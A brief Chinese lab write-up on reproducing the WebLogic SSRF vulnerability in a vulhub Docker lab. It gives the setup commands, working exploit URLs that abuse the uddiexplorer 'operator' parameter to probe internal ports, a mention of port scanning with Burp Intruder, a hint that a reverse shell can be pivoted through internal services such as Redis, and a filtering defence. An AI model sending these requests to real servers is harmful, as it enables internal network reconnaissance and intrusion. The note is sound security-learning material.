weblogic ssrf

参考资料:https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf

docker空间管理

1
2
3
4
du -h --max-depth=1 寻找当前目录,哪个文件夹占用空间最大
docker system prune -a 删除镜像
docker system df 查看磁盘使用情况
docker-compose down -v 删除正在用的实例

ssrf

1
2
3
4
5
6
7
cd /usr/share/vulhub-master/weblogic/ssrf
docker-compose build
docker-compose up -d
pkill rinetd ##关闭进程
rinetd -c /etc/rinetd.conf ##启动转发
---
docker-compose down -v

ssrf是服务端请求伪造,意思是服务器接受我们的请求后,然后向内网发起扫描等有害操作。该漏洞出现的原因是服务器需要向内网其他机器获取资源,在请求的过程中,参数可被攻击方修改。

下图是weblogic典型的界面。下面我们看看怎么利用它。

访问以下地址:

1
2
3
http://18.189.18.237:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

http://18.189.18.237:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7002

用burp intruder可以看到7001页面显示的长度,和其他端口不同,说明7001端口开放。

如果内网有其他web漏洞可以反弹shell,例如redis…也可以通过上面的operator=http://127.0.0.1:7002参数反弹shell

防御方法

过滤参数,禁止参数访问内网IP,例如上文所说的operator参数。